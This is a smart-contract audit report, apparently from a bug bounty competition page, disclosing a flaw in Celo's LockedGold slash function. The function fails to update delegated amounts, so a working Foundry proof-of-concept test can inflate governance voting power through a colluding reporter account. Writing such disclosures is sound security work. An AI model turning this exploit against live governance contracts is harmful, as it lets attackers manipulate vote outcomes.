#37251 [SC-Critical] Fraudulent padding of governance voting power

Submitted on Nov 30th 2024 at 02:15:23 UTC by @innertia for Audit Comp | Celo

Report ID: #37251
Report Type: Smart Contract
Report severity: Critical
Target: https://github.com/celo-org/celo-monorepo/blob/release/core-contracts/12/packages/protocol/contracts/governance/LockedGold.sol
Impacts:
- Manipulation of governance voting result deviating from voted outcome and resulting in a direct change from intended effect of original results

Description

Brief/Intro

Slash reduces or increases a user's nonvoting balance. However, there is no processing related to delegete. This can cause various vulnerabilities, but this report will introduce the fraudulent inflation of voting rights by attackers.

Vulnerability Details

The slash function increases or decreases the nonvotingBalance of the target account or reporter. However, if a delegation has occurred beforehand, the increase or decrease of the delegation amount must also be calculated.

      _decrementNonvotingAccountBalance(account, maxSlash.sub(difference));
      _incrementNonvotingAccountBalance(reporter, reward);

https://github.com/celo-org/celo-monorepo/blob/3c58a09455a12518916d2df38693325bafeb462b/packages/protocol/contracts/governance/LockedGold.sol#L505-L506

For example, if you look at the lock function, which is another process that increases nonvotingBalance, you can see that it also updates DelegatedAmount.

    _incrementNonvotingAccountBalance(msg.sender, msg.value);
    _updateDelegatedAmount(msg.sender);

https://github.com/celo-org/celo-monorepo/blob/3c58a09455a12518916d2df38693325bafeb462b/packages/protocol/contracts/governance/LockedGold.sol#L150-L151

slash does not do this, so there is no consistency between the increase/decrease in nonvotingBalance and DelegatedAmount. This can lead to various attack methods and calculation errors, but I would like to introduce one example, which is inflating the number of voting rights.

I will explain the step-by-step process while implementing it within the POC.

Impact Details

Inflating the number of votes
Withdrawing tokens while maintaining the number of votes etc.

References

https://github.com/celo-org/celo-monorepo/blob/3c58a09455a12518916d2df38693325bafeb462b/packages/protocol/contracts/governance/LockedGold.sol#L505-L506. https://github.com/celo-org/celo-monorepo/blob/3c58a09455a12518916d2df38693325bafeb462b/packages/protocol/contracts/governance/LockedGold.sol#L150-L151

Proof of Concept

3. Proof of Concept

Please add the following test_GovernanceVotingPowerFraudulentlyInflated function to the LockedGoldTest_slash contract in LockedGold.t.sol. https://github.com/celo-org/celo-monorepo/blob/release/core-contracts/12/packages/protocol/test-sol/unit/governance/voting/LockedGold.t.sol. https://github.com/celo-org/celo-monorepo/blob/3c58a09455a12518916d2df38693325bafeb462b/packages/protocol/test-sol/unit/governance/voting/LockedGold.t.sol#L1096C10-L1096C30

function test_GovernanceVotingPowerFraudulentlyInflated() public {
//attackerMain: account that gathers voting power
address attackerMain = actor("attackerMain");
address attackerMainSigner;
uint256 attackerMainSignerPK;

//attackerSub: A decoy account
address attackerSub = actor("attackerSub");
address attackerSubSigner;
uint256 attackerSubSignerPK;

uint256 percentToDelegate = 100;
uint256 delegatedAmount = (value * percentToDelegate) / 100;

vm.prank(attackerMain);
accounts.createAccount();
vm.prank(attackerSub);
accounts.createAccount();
(attackerMainSigner, attackerMainSignerPK) = actorWithPK("attackerMainSigner");
(attackerSubSigner, attackerSubSignerPK) = actorWithPK("attackerSubSigner");

vm.deal(attackerSub, 10 ether);

//Lock celo by attackersub
lockCelo(attackerSub, value);

//100% delegation from attackerSub to attackerMain
delegateCelo(attackerSub, attackerMain, 100);

//By delegation,all of the VotingPower has been given to attackerMain.
assertEq(lockedGold.getAccountTotalGovernanceVotingPower(attackerSub), 0);
assertEq(lockedGold.getAccountTotalGovernanceVotingPower(attackerMain), value);

//The attackerSub carries out an act that deserves a slash, and reports it to the Slasher.
//The important thing is that this reporter is also an account related to the attacker.
uint256 penalty = value;
uint256 reward = value;
address[] memory lessers = new address[](1);
lessers[0] = address(0);
address[] memory greaters = new address[](1);
greaters[0] = address(0);
uint256[] memory indices = new uint256[](1);
indices[0] = 0;

vm.prank(downtimeSlasher);
lockedGold.slash(attackerSub, penalty, reporter, reward, lessers, greaters, indices);

//reward is given to the reporter
assertEq(lockedGold.getAccountNonvotingLockedGold(reporter), reward);

//The reporter (the attacker's related account) who received the reward delegates this to attackerMain
delegateCelo(reporter, attackerMain, 100);

//The attackerMain has GovernanceVotingPower that has been fraudulently inflated.
//In this sequence, the locked celo is only the `value`. In other words, GovernanceVotingPower should only exist for the `value`.
//However, by taking advantage of the flawed implementation of `slash`, GovernanceVotingPower can be padded to the value + reward (in this example, it is doubled).
//This is a manipulation of voting rights, and is a significant damage to the protocol.
assertEq(lockedGold.getAccountTotalGovernanceVotingPower(attackerMain), value + reward);

}

Previous#37206 [SC-Medium] Overflow due to lack of checks leading to incorrect price calculation Next#37285 [SC-Critical] Incorrect Delegation State After Slashing in LockedGold Contract

Last updated 7 months ago

Was this helpful?